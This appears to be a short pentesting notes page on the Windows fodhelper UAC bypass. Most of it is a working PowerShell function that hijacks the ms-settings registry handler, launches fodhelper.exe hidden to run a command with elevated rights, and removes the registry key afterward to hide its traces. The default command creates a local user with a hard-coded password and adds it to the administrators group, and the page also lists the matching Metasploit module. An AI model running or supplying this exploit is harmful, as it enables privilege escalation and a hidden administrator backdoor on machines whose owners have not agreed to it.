fodhelper
Usage: . .\FodhelperBypassUAC.ps1; FodhelperBypassUAC [-custom COMMAND]
function FodhelperBypassUAC(){
Param (
[String]$custom = "cmd.exe /c net user kashz iamR00t123! /add && net localgroup administrators kashz /add" #default
)
# Registry Additions
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $custom -Force
# Bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
# Cleanup
Start-Sleep 5
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}msf
run exploit/windows/local/bypassuac_fodhelper
Reference
Last updated
Was this helpful?